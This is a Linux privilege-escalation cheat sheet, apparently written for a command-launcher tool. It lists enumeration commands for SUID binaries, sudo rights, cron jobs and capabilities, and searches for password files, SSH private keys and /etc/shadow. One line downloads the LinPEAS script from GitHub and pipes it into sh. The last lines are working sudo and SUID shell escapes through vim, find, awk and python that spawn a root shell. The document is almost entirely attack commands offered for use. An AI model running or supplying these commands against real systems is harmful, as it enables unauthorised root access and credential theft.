% privesc, linux, escalation

# Find SUID binaries
find / -perm -4000 -type f 2>/dev/null

# Find SGID binaries
find / -perm -2000 -type f 2>/dev/null

# Check sudo permissions
sudo -l

# Find writable directories
find / -writable -type d 2>/dev/null

# Find world-writable files
find / -perm -o+w -type f 2>/dev/null

# Check cron jobs
cat /etc/crontab
ls -la /etc/cron*
crontab -l

# Find capabilities
getcap -r / 2>/dev/null

# Check for docker group
id | grep docker

# Check kernel version (for exploits)
uname -a

# Check OS version
cat /etc/os-release

# LinPEAS
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

# LinEnum
./LinEnum.sh -t

# Check passwd file writable
ls -la /etc/passwd

# Check shadow file readable
ls -la /etc/shadow

# Find password files
find / -name "*.txt" -exec grep -l "password" {} \; 2>/dev/null

# Check NFS exports (no_root_squash)
cat /etc/exports

# Find SSH keys
find / -name "id_rsa" 2>/dev/null
find / -name "authorized_keys" 2>/dev/null

# Check PATH hijacking
echo $PATH
ls -la /usr/local/bin

# GTFOBins sudo bypass - vim
sudo vim -c ':!/bin/sh'

# GTFOBins sudo bypass - find
sudo find . -exec /bin/sh \; -quit

# GTFOBins sudo bypass - awk
sudo awk 'BEGIN {system("/bin/sh")}'

# GTFOBins SUID - python
./python -c 'import os; os.execl("/bin/sh", "sh", "-p")'